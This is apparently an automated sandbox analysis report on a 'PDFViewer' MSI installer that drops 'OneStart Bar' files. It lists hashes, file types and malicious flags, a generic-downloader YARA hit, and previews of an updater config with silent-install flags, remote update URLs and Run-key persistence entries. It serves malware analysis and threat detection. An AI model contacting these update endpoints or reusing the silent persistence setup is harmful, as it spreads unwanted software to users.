                      SHA-512:DE5546FF103CCC6AA38E254039A372697A193F9C44D0A44F0BE3B242D9EEF63023DC3FD0C6E8E0D2363177F9230A4E7200D4C32591B398269A1CEE9BC47A99FC
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):68096
                      Entropy (8bit):5.818047449027304
                      Encrypted:false
                      SSDEEP:
                      MD5:35FE0315D05DF3F4E877EA8114666356
                      SHA1:F0AD167601CDF9C334663585A19677F3A44E2126
                      SHA-256:04A1011BA50599FBD34FE0776E25A930F172287051C0520623BDF82533A90D52
                      SHA-512:C981D41357684086DFC3A479F3D52DAC68D47FF2DB1407E6A1C10175DADA15D79B9C49BDB6CB5FB642152BFECAAA4E6CD50531C2A4BEAFA7EA404AA6124E5C18
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):148480
                      Entropy (8bit):5.9698848168032015
                      Encrypted:false
                      SSDEEP:
                      MD5:1DB099283F367291F51A7D53D4A95A34
                      SHA1:6FBAF3FF0B05FF9A322081B9889F960A75889E8E
                      SHA-256:2DF4F0CFECF858F4C1415F26A06674163016D86BDA1BA9CF2B510722307143B1
                      SHA-512:4462581559D19A803E96245DD6018FB5B5717E1FD35D656204E5CDF46D36BD2F7C6E6E7C768A01D8887F95EAAF1A782C48ECBCCAB0EA1AABA1139DF976EF7E0A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):243576
                      Entropy (8bit):6.63219267320993
                      Encrypted:false
                      SSDEEP:
                      MD5:9AD549C121108B3B1408A30BEE325D08
                      SHA1:898FFC728087861E619DABABD8E65CC902276D06
                      SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                      SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):436600
                      Entropy (8bit):6.647435576141042
                      Encrypted:false
                      SSDEEP:
                      MD5:8FF1898897F3F4391803C7253366A87B
                      SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                      SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                      SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):21384
                      Entropy (8bit):6.470094803230791
                      Encrypted:false
                      SSDEEP:
                      MD5:C946A9E4170F6B16D25C822DA616DC6A
                      SHA1:F602D23DB756F9C3A058D3B7186D24480E05790F
                      SHA-256:65BDADB5562B9473471740B1DCD8B064459A40D71A1A11FC5AEDAA855FE7635A
                      SHA-512:916CAD8B1E38B2B15AB836844C5CC9D36B212831B2F553198054FE9CB5CD77AECD544CAC8040000337CEFDA9B15BF95E8903F36A9C1BEB7D579CFFF670445617
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):166264
                      Entropy (8bit):6.800892494270331
                      Encrypted:false
                      SSDEEP:
                      MD5:06DEEA1786C951D3CC7E24A3E714FF03
                      SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                      SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                      SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):52104
                      Entropy (8bit):5.1488364199396335
                      Encrypted:false
                      SSDEEP:
                      MD5:FFB8C73E6E3769D5D8715E694707C792
                      SHA1:F7D63FA41C34D7B75CD70D72E317DB148F3D50CA
                      SHA-256:1DD7D3417FFFC321A67AAE2CA7E89A7D75203F8A3586CD829C56766F313F7931
                      SHA-512:61E83F71A388FD1176665225CC84C32FAC40663376629ADBE9B47CD9E69DDADC43FEC021B07062585AF80811E8F3E0479314B2277E6CB8617645FD304FAE88AB
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):18816
                      Entropy (8bit):6.421430337596372
                      Encrypted:false
                      SSDEEP:
                      MD5:EF6C5EEB8B36D941E6991E6981CDB88A
                      SHA1:E21989951B745B290F143DD63F94BD4399A74284
                      SHA-256:3859B4A5A5C0A30CEE15C188F678E09D040541C221999D926955B49E8779E675
                      SHA-512:12CB0C4E4DE73600E262B6B6D0448FB050BD4B673D86265B4033B253EA3864DDA4F004F6344AAE5BED7A15D5717531F7B18374E47FF4258E027EE7B896F6F406
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):98616
                      Entropy (8bit):5.627990537858435
                      Encrypted:false
                      SSDEEP:
                      MD5:0ADF6F32F4D14F9B0BE9AA94F7EFB279
                      SHA1:68E1AF02CDDD57B5581708984C2B4A35074982A3
                      SHA-256:8BE4A2270F8B2BEA40F33F79869FDCCA34E07BB764E63B81DED49D90D2B720DD
                      SHA-512:F81AC2895048333AC50E550D2B03E90003865F18058CE4A1DFBA9455A5BDA2485A2D31B0FDC77F6CBDFB1BB2E32D9F8AB81B3201D96D56E060E4A440719502D6
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, Author: Joe Security
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):903184
                      Entropy (8bit):6.422534936083721
                      Encrypted:false
                      SSDEEP:
                      MD5:48B789F7529C96B0283ACCC15785E7AB
                      SHA1:7D8526449160CC90B57437C80D7C99D64CC8F713
                      SHA-256:1578F898C74EAEF3E91BCE2B3B699034E75059387619BE3BACF7EE2773232270
                      SHA-512:D8A85B95478A50F5E46FE7DBCD6EC202217EC88EC32799D4C444FAFBD69F683E11FD6C61F7B851BAA73380E187F7DF6D3874759736FFBFD01C3A55B8ACDFDE1D
                      Malicious:true
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):448
                      Entropy (8bit):5.393161588507139
                      Encrypted:false
                      SSDEEP:
                      MD5:16B77BE8ADDDFE7305BE47B41A432839
                      SHA1:E192DA54B5570C2B7FE9AD3DDCC72DC2043A5393
                      SHA-256:9A7089446D672B8E76FBA8E8F3B8DE969BA99E9053D5073DA17A17BFD7374957
                      SHA-512:0A8F90CFB33203B6C3A65BD9A432B9E9EBC6506E528004BDFE8B770D9783F83468CADEE606A8A21CCBB60D0C60A818F41D7F3227762D992C9FD2D356394EE077
                      Malicious:false
                      Reputation:low
                      Preview:[General]..AppDir=C:\Users\user\AppData\Roaming\OneStart\bar\..ID={4CF3F912-D8D7-4F3B-AC2B-F452689891AC}..ApplicationName=OneStart Bar..CompanyName=OneStart.ai..ApplicationVersion=1.10.14.30800..DefaultCommandLine=/silentall -nofreqcheck..URL1=https://Av9fXr.com/api/dbar/updates.txt..CheckFrequency=2..DownloadsFolder=C:\Users\user\AppData\Roaming\\OneStart\.updates\..Flags=NoUpdaterInstallGUI..URL=https://j9vfy4.com/api/dbar/updates.txt..
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):267656
                      Entropy (8bit):6.547035182798101
                      Encrypted:false
                      SSDEEP:
                      MD5:2FB4C4168E379F13B15D4E299ECF3429
                      SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                      SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                      SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):76168
                      Entropy (8bit):6.765544990184352
                      Encrypted:false
                      SSDEEP:
                      MD5:1A84957B6E681FCA057160CD04E26B27
                      SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                      SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                      SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):226816
                      Entropy (8bit):5.805239882361139
                      Encrypted:false
                      SSDEEP:
                      MD5:E67544B112F568F13B17D72189FDA007
                      SHA1:B75B79C65330A77FE7AEA5EF6C319D7F3D1865D4
                      SHA-256:697F13F09CB2C425DDCFE1AA167D698F7AF5AEA48D03D5370143BC00E9BBFA2E
                      SHA-512:5A3381C0BE69DF8DC5A8C7C931B14919A189A8D03D2128D3848FBF73E3FD21631FE44ECCD9BAF97A15F646D0FCC5B3263B6EAC2F98D67557A07AD6FB4F91C402
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {2CE2B914-78AF-427B-8432-9E1112FB705D}, Number of Words: 10, Subject: OneStart Bar, Author: OneStart.ai, Name of Creating Application: Advanced Installer 15.8 build b14c769f44, Template: ;1033, Comments: This installer database contains the logic and data required to install OneStart Bar., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Category:dropped
                      Size (bytes):6721024
                      Entropy (8bit):7.872546454043731
                      Encrypted:false
                      SSDEEP:
                      MD5:4A3439907F9E8F17D354940F46FA0EDB
                      SHA1:D94178382C0FE6C8A59A6A6485CF4B44617C0796
                      SHA-256:0CDA9799E63F8CFAA06E6AA1A86323EE88C75C8D765B5FC15813E093C576C4F1
                      SHA-512:4906A85986BEB13EA981861C4EC0416C6220EE82B81E4D990831FFCE318730F2B0E2CEAEE053DC15954E851060D711132D4F657AC16AE2AEBA95A8F82A599C60
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):165068
                      Entropy (8bit):5.908994034674469
                      Encrypted:false
                      SSDEEP:
                      MD5:54025434F0563927029BC80F30161D2E
                      SHA1:8D4BFDBCF7F1BB0A81D615B051205459237ACEF0
                      SHA-256:F704F7545037BC949B3578A7C5FE2DCE0DC2BD22171AE09F9CFA8A9748CA82F6
                      SHA-512:2351CFB5289955179BA08835BBDE0FF649BB5CFECCFF72DBE59FA319089B0EC2C08C75562B1EDD7BD91A0DBEA55D14C705651D765EC1D903D519742020BD4F91
                      Malicious:false
                      Reputation:low
                      Preview:...@IXOS.@.....@8..W.@.....@.....@.....@.....@.....@......&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}..OneStart Bar..OneStartBarSetup.msi.@.....@.....@.....@......icon_OneStart2.exe..&.{2CE2B914-78AF-427B-8432-9E1112FB705D}.....@.....@.....@.....@.......@.....@.....@.......@......OneStart Bar......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{8064D080-8B31-4027-A1D4-2EFE744DD72D}T.C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll.@.......@.....@.....@......&.{D33FE035-BFCF-4952-91EA-C72C8255422A}C.01:\Software\Microsoft\Windows\CurrentVersion\Run\OneStartBarUpdate.@.......@.....@.....@......&.{AA0BFFD3-140A-470C-B1B1-A4889A10C752}H.C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dll.@.......@.....@.....@......&.{438E3D79-1801-4187-9FC8-D2F881C27033}=.01:\Software\Microsoft\Windows\CurrentVersion\Run\OneS
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):20480
                      Entropy (8bit):1.166648081126449
                      Encrypted:false
                      SSDEEP:
                      MD5:B05D2B46D5DAE4F44689014C8123DBAF
                      SHA1:E23D82704564923079E27F697FAF93D188331985
                      SHA-256:7B2EE3E1F922498F733CEECEDEE9910237AE6F6F568316DE8FF74566FCEEDF16
                      SHA-512:19E7B5A091C52202E494390B2D8A5D092B9EB81645A1B62516D7EA97A3EBF09FE39C0518C5ABEA01C4DB96B53AC687C863F7E3A3C35FE5C4A04E1D8541CA90F5
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):323399
                      Entropy (8bit):5.392662267929109
                      Encrypted:false
                      SSDEEP:
                      MD5:37088A8F0EE0299798824F249C939488
                      SHA1:216FBB7407AC41426971E7E3D23FFCFDC063DB30
                      SHA-256:7A1113534F9E2B820EBE768FAD7AD161573B0C80F1BA602D11B3219C464E6794
                      SHA-512:0FF2B427DC51F41F40ADE0070101AAAD29CB1443A7198E461912ECA4831EEA11F2F116FE843A97A1566257F973EA74BEBB4D8C6A1B1E99D00574C678FB14EB28
                      Malicious:false
                      Reputation:low
                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..03/19/2019 06:29:48.034 [4768]: Command line: D:\wd\compilerTemp\BMT.thr2gc0c.r44\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..03/19/2019 06:29:48.065 [4768]: Executing command from offline queue: install "System.IdentityModel.Selectors, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:3..03/19/2019 06:29:48.065 [4768]: Exclusion list entry found for System.IdentityModel.Selectors, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil; it will not be installed..03/19/2019 06:29:48.065 [4768]: Executing command from offline queue: install "System.AddIn.Contract, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies /queue:3..03/19/2019 06:29:48.065 [4768]: Exclusion
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):434
                      Entropy (8bit):3.6232959356698387
                      Encrypted:false
                      SSDEEP:
                      MD5:E441A19363EC37EE8C8937830CD6B27E
                      SHA1:1849B6880C999B2BF2DBA2E27E12D726EF4B104A
                      SHA-256:3CD5327E468D55CC8F1C79B86A97571F94CA92D37FCC695673A1698E9664244C
                      SHA-512:F43D702898BC74EC77BEEB563F43F9F13B9DE9A0509AECC48D3DEB769E31C60660EC6D64DEFE621B5FC29300CE35543BC84680B3A5907F8FB77AB99A9B53C502
                      Malicious:false
                      Reputation:low
                      Preview:......L....A..n...kF.......<... ................".................... .C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e..._./.i. .".C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.D.e.s.k.t.o.p.\.P.D.F.V.i.e.w.e.r._.4.4.8.8.2.5.6.4. .(.1.)...m.s.i.". .A.D.D.L.O.C.A.L.=.B.B.W.C.,.D.e.s.k.t.o.p.B.a.r.,.M.a.i.n.F.e.a.t.u.r.e. .......A.L.F.R.E.D.O.-.P.C.\.a.l.f.r.e.d.o...................0.................9.............................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):1.4303475141063178
                      Encrypted:false
                      SSDEEP:
                      MD5:27CC92DB51319912CCD3C06148B73BBD
                      SHA1:82BE479237DE13D99946C3606876960BCD4FEB34
                      SHA-256:C3835410D63C0D570E1D3191071E6B267FDD8C05FCD5B7B9E43D6369413EB9F1
                      SHA-512:BCF3372526C64D01C1946118D449FC69656BDA28A383AB492677150B5B88FC24279725632DF3ECFDC928A09796BDDA961B70C0893684A0F88FB8471657EC0C38
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):73728
                      Entropy (8bit):0.23043318347027758
                      Encrypted:false
                      SSDEEP:
                      MD5:275D021BB08DB4BF26ED6D48DE6F11C6
                      SHA1:1C5186ED46BE6F5422224120DE55CE765378779D
                      SHA-256:5AF6D28B06BA3B98030419A23511BEDD5321E7A489D0EFDD36454097318F4674
                      SHA-512:BC4823C545DEBF4339E2DEB348DC0C6C9B6535FE011571DE1D699B34FB649DD85EBB6F5F6091E590E839FBFE410180AC1DDE3F4B0BBF611E855C96B69B084166
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.07382680316930298
                      Encrypted:false
                      SSDEEP:
                      MD5:82D0B3AC04A7A9C3B8C747C96E463D40
                      SHA1:5AD9EACDA699C28E8D9CC331B778D9996BB69ABC
                      SHA-256:A1940FB1B5A2B441B08E809F8E7C9BA6036B27F65D13607484EFB77C65BA0D07
                      SHA-512:24F289966CADAE9F536C9EC2BE7D9A61FCD7AD50409CE45F5A553ECFE903593FD930B93DDEC461F32977FB4F81495AC47469ECE496AFA4CA8B887EE9057F8C57
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):20480
                      Entropy (8bit):1.809104813201221
                      Encrypted:false
                      SSDEEP:
                      MD5:C275ED3C5EC6E4F585813E820ADCFBDC
                      SHA1:365639328275075C4D01A28E85A702AB43132C5E
                      SHA-256:E3BACDEB09EBA2E5582A36151ACEBDF277799F514FA3096E2D4856418FDDC6B6
                      SHA-512:CEDF330D736CDD8FB9B04A63B4A75627177CACDDCD103BBEECD08F8E1244C4E62570204C757401050E850E642FB74E6040851DDD564C5C2942012EE2BFEE1ED8
                      Malicious:false
                      Reputation:low
                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {513C0B82-B6F3-4B16-80A5-0F807E70450D}, Number of Words: 10, Subject: OneStart Software, Author: OneStart.ai, Name of Creating Application: Advanced Installer 15.8 build b14c769f44, Template: ;1033, Comments: OneStart Software, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Entropy (8bit):7.980552918266732
                      TrID:
                      • Windows SDK Setup Transform Script (63028/2) 47.91%
                      • Microsoft Windows Installer (60509/1) 46.00%
                      • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                      File name:PDFViewer_44882564 (1).msi
                      File size:101'422'592 bytes
                      MD5:299098d3040c4ad8e52e0835e82c4ca7
                      SHA1:4a0e233aee3854a957baac068370394a571078a3
                      SHA256:39c81ea1223edf1f79d04ff5baefa8b2b95b9844972d564ef769dce3cab555c9
                      SHA512:3ebf3b8a1632127780a3002b92ff8c0a07bb5d4927a3a0298b999b1a4c9367fee808af6f3fd0488ca7687e9fe54d8709f5cf6705604901cec2e8b8a0b91ad3ab
                      SSDEEP:1572864:KEaDdKVqxGs985Ev0VGgWiBNM5BWSkfphFOIP1PO0rmosZpJdSk571JA:pwcMWOv0Be5QSYbOGW8mosZdD5e
                      TLSH:DC2833227986C936C1BF05701D29EB6E41BE7E250B7154DBA3DC6F2E1A728C24631F63
                      Icon Hash:2d2e3797b32b2b99